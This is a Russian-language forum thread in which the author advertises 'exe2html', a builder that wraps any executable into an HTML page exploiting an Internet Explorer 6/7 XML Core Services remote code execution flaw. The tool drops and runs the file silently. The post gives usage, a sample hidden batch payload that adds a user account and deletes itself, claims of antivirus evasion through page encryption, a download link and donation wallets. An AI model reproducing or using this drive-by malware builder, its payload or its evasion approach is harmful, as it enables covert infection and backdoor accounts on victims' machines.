Написал программу exe2html
 

Данная программа написана для того чтобы тестировать уязвимые
системы. Вы используете эту программу на свой страх и риск.
Автор программы не несет ответственности за то что вы можете
натварить с помощью этой программы :)
Если вам понравилась программа то, киньте кто сколько может на кошелек
WMZ: Z671833489051
WMR: R156568501269
БУДУ очень благодарен!!

ВНИМАНИЕ!!!!!!!!!!!!!!!!!
Работа программы основанна уязвимости: MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
Поэтому для запуска прикрепленной программы, необходимо проссмотреть созданную страницу через не пропатченый IE 6/7

МАКСИМАЛЬНЫЙ РАЗМЕР ПРИКРЕПЛЯЕМОЙ ПРОГРАММЫ - 11 КИЛОБАЙТ!!!!
ИМЕННО ПО ЭТОМУ АКТУАЛЬНЕЕ ВСЕГО ПРИКРЕПЛЯТЬ *.BAT ФАЙЛЫ
И ПРОГРАММЫ НАПИСАННЫЕ НА ASM

Ипользование программы:
exe2html.exe show_param file_in file_out
Где:
show_param - парамерт отображения прикрепленной программы при запуске.
1 - Показывать окно
0 - Не показывать окно
file_in - файл который встраивается в html страницу. Прикреплять слудует только исполняемые файлы
такие как *.exe *.com *.bat
file_out - выходной файл в котором будет находиться готовая страница.
Для того чтобы запустился код в html-файле файл должен иметь расширение: *.html *.htm

Принцип работы:
При проссмотре созданной странице через IE - запускается код помешенный в страницу, этот код сохраняет
прекрепленную программу в папку TEMP и заупускает её

Пример использования:
1) exe2html.exe 1 c:\1.exe c:\2.html
Создаст на диске C: файл 2.html в которую запихнет программу 1.exe находящююся на диске C:
При запуске прикрепленной программы окно будет показываться.
2) exe2html.exe 0 c:\1.bat c:\2.html
Создаст на диске C: файл 2.html в которую запихнет пакетный файл 1.bat находящююся на диске C:
При запуске пакетного файла окно не будет показываться.
В пакетный файл может выглядеть следующим образом:
net user myuser mypass /add
del %0
т.е. создаст пользователся myuser с паролем mypass и удалит сам себя.


Связь с автором программы:
ICQ: 266-334-734
E-mail: slesh-2000@yandex.ru
WMZ: Z671833489051
WMR: R156568501269

Кому будет нужна программа, то стучитель ко мне в ICQ 266-334-734

мухахаха

можно понять, что это 0day сплоит, если вчитаться... :DD

2 n1†R0x
Именно по этому я и написал что прога сделана на базе MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit

ВОт единственное что не поуму, это то чно не на всех компах работает. т.е. шелл-код - 100% работает на 2000 Xp и 2003.
На разных компах стоят ослы одинаковых версий. На одном пашет, на другом нет :\

о господи.. я уже подумал, типа софтина конвертирует каким=-то образом экзе в хтмл жесть)))

=/

Кстати говоря. Добавил простенькое шифрование страницы. теперь антивири не палят создаваемые страницы. А раньше палили.
НО есть маленькое НО:
при присабачивании 11 килобайтной проги размер страницы = 127 килобайт

кидай ссылку сюда. или в пм есле в паблик не хочеш!

Вот ссылка: http://www.slesh.xost.ru/up.php?act=get&file=exe2html.zip
Версия чуть кривоватая. Т.к. из 11 килобайтной проги получается страница в 11 раз больше. т.е. 121 килобайт. Чуть по позже модернизирую чтобы уменьшить размер хотябы в 2-3 раза.